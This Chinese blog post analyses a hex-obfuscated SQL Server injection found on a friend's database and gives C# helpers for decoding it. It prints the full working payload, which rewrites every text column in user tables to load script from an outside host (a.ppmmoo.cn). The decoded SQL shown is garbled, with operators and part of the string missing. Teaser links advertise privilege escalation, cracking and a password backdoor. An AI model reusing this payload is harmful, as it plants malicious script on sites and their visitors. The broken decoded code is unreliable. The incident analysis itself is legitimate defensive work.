SQL Hex Injection 十六进制注入解决方案

所属分类: 网络安全 / 加密解密 阅读数: 150
收藏 0 赞 0 分享

今天朋友遇到一个问题,他的sql server 数据库被执行了一条语句
dEcLaRe @s vArChAr(8000) sEt @s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52 eXeC(@s)--
从0x可以看出这是一段十六进制编码的sql语句
于是想到将其解码:
对于十六进制字符串编码和解码的C# 方法如下:

复制代码
代码如下:

///
/// 从字符串转换到16进制表示的字符串
///
///
/// 编码,如"utf-8","gb2312"
/// 是否每字符用逗号分隔
///
public static string ToHex(string s, string charset, bool fenge)
{
if ((s.Length % 2) != 0)
{
s += " ";//空格
//throw new ArgumentException("s is not valid chinese string!");
}
System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset);
byte[] bytes = chs.GetBytes(s);
string str = "";
for (int i = 0; i < bytes.Length; i++)
{
str += string.Format("{0:X}", bytes[i]);
if (fenge && (i != bytes.Length - 1))
{
str += string.Format("{0}", ",");
}
}
return str.ToLower();
}</p> <p> ///
/// 从16进制转换成utf编码的字符串
///
///
/// 编码,如"utf-8","gb2312"
///
public static string UnHex(string hex, string charset)
{
if (hex == null)
throw new ArgumentNullException("hex");
hex = hex.Replace(",", "");
hex = hex.Replace("\n", "");
hex = hex.Replace("\\", "");
hex = hex.Replace(" ", "");
if (hex.Length % 2 != 0)
{
hex += "20";//空格
throw new ArgumentException("hex is not a valid number!", "hex");
}
// 需要将 hex 转换成 byte 数组。
byte[] bytes = new byte[hex.Length / 2];
for (int i = 0; i < bytes.Length; i++)
{
try
{
// 每两个字符是一个 byte。
bytes[i] = byte.Parse(hex.Substring(i * 2, 2),
System.Globalization.NumberStyles.HexNumber);
}
catch
{
// Rethrow an exception with custom message.
throw new ArgumentException("hex is not a valid hex number!", "hex");
}
}
System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset);</p> <p> return chs.GetString(bytes);
}

于是对这段代码进行解码:

复制代码
代码如下:

private static void TestHexStringDecode()
{
string oldSql = "6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52";
Console.Write(System.Web.HttpUtility.UrlDecode( UnHex(oldSql, "utf-8").ToLower()));
}

这样它的原型就现出来了

复制代码
代码如下:

declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a
.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch
next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['
@t '] set [' @c ']=rtrim(convert(varchar,[' @c '])) ''"> ose table_cursor deallocate table_cursor

进行注入的人的网址就是a.ppmmoo.cn

大家平时应该多注意这种注入, 可以通过控制对数据库的权限来避免上面这段代码的注入,据朋友介绍此人是在光纤的电脑上注入的,估计用肉鸡,或者服务器~~~
另外 http://home2.paulschou.net/tools/xlate/ 这个网址可以对Hex编码的字符串进行解码

更多精彩内容其他人还在看

WEBSHELL提升权限又一招(Mysql漏洞)

S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介
收藏 0 赞 0 分享

常见保护的攻击:序列号方式

(1)序列号保护机制   数学算法一项都是密码加密的核心,但在一般的软件加密中,它似乎并不太为人们关心,因为大多数时候软件加密本身实现的都是一种编程的技巧。但近几年来随着序列号加密程序的普及,数学算法在软件加密中的比重似乎是越来越大了。  
收藏 0 赞 0 分享

谈谈软件的破解原理

从本章开始,我们来一步一步学习Crack软件(80%读者昏死过去,且不省人世...另有20%在寻找附近可以用来打人的东西) 不可不说一下学习破解的三个阶段: 初级,修改程序,用ultraedit等工具修改exe文件,称暴力破解,简称爆破 中级,追出软件的
收藏 0 赞 0 分享

用Dos命令进行加锁 防病毒格式化硬盘

越来越多的病毒程序进行对计算机数据的破坏,有些病毒更直接格式化硬盘分区。 其实,我们可以用小命令来阻止病毒程序对硬盘的格式化等破坏操作。 用“记事本”打开C盘根目录下的Autoexec文件,并在其中添加如下语句:
收藏 0 赞 0 分享

用Dos命令解开远程NT服务器用户密码

如知道一个NT帐户与密码,就可以用 net use \主机ipc$Content$nbsp;"密码" /user:"用户" 与远程主机建立连接,这是每一个黑客或是梦想成为又或是正在努力成为黑客的朋友都知道的方法,甚至连我
收藏 0 赞 0 分享

对某ASC加密网马的破解和利用

QQ群中,有人在叫卖网马。网友花钱获得一个共享给我,让我看看。于是有了下面的这篇文章。   1.网马初探   在浏览器中打开网马,这个网马的功能比较简单,主要用来上传功能更强的网马。比较有特色的是可以在目标网页的上传漏洞,自己修改修改配置。查看该网马
收藏 0 赞 0 分享

教你利用IAT hook实现windows通用密码后门

先不管是不是真的有,我们可以自己实现一个这样的后门。 先简单介绍一下windows登陆过程中的一些过程。 winlogon进程用gina.dll获取用户名和密码,通过LPC传给lsass进程。 然后lsass进程调用默认认证包msv1_0.dll来验证密码的对错
收藏 0 赞 0 分享

网页加密完全攻略

现在专业性的网站越来越多,许多网友们都在网上建立起了自己的小家。不过辛辛苦苦制作的网页被人拿去改头换面却是件非常痛心的事,所以大家都想保护自己独创的作品,为自己的网页上把锁,今天就让我带大家了解一下如何给我们的网页加上一把密码锁。 一、常用JavaScript
收藏 0 赞 0 分享

总结一些加密算法

有一些是之前学破解写注册机时写的,一些是我改写某些兄弟的代码来的,写的不好多多指教: {======================================================= 学习破解,写注册机的一些函数集
收藏 0 赞 0 分享

UPX程序破解过程

入门级的破解,用ollydbg 我用UPX将NOTEPAD.EXE加壳,选择OllyDbg 1.09d来脱壳。首先加载被加壳的程序, 程序直接定位到01014110 $60 PUSHAD处,选择CTRL F 输入查找内容"POPAD", OD
收藏 0 赞 0 分享
查看更多